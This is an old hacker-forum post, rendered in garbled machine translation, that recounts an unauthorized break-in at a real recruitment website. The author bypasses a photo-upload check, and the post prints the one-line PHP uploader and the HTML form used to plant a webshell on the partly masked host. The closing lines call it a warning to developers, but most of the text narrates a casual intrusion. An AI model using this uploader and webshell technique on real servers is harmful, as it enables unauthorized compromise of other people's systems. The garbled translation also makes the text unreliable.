Talent network a common problem-a vulnerability warning-the black bar safety net

ID MYHACK58:6220055701
Type myhack58
Reporter 佚名
Modified 2005-12-23T00:00:00


Today empty down in the visiting talent network. In a matter of habit...so on the fly detection. The program is php,itself due to a PHP injection also not very hanging. So it is looking for a few point of the actuator on the try. Also seems to be no big flower head. On another page it at.

Continue to come home,Ah. Talent network can transfer photos on the go?. May wish to try it out Anyway idle is also idle. Registration number see`yo,you also don't say. Also really is I guess

Skip the registration process. Registration after log in ... Upload a photo." You can only transfer jpg file format"... You said You can only pass jpg I believe? I'm also not stupid,so I pass a php file on the go. Huh..stating file is too big.. haha..that may pass the shell. Another pony on the line. Well..that's OK...

First a pony up Code <? php copy($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);?& gt;

Success. See is an X To see the properties. The address is http://userfile.***. cn/seeker/416196/901/r3j3ct123/test.php

Well slightly. Below put the htm changing for the better ACTION..

<form ENCTYPE="multipart/form-data" ACTION="http://userfile.xxx.cn/seeker/416196/901/r3j3ct123/test.php/" METHOD="POST"> <input NAME="MyFile" TYPE="file"> <input VALUE="submit" TYPE="submit"> </form>

Looking for a Malaysia. Submit up` Success..lovely shell it is perfect presented in front of the......

Something,in fact it's a upload problem is not what technical content. No,should say is nothing..only to be hoped that this article can remind those talent network the author of the program. Have to pay attention to some small details. Often you ignore the place. Is someone to start with Place..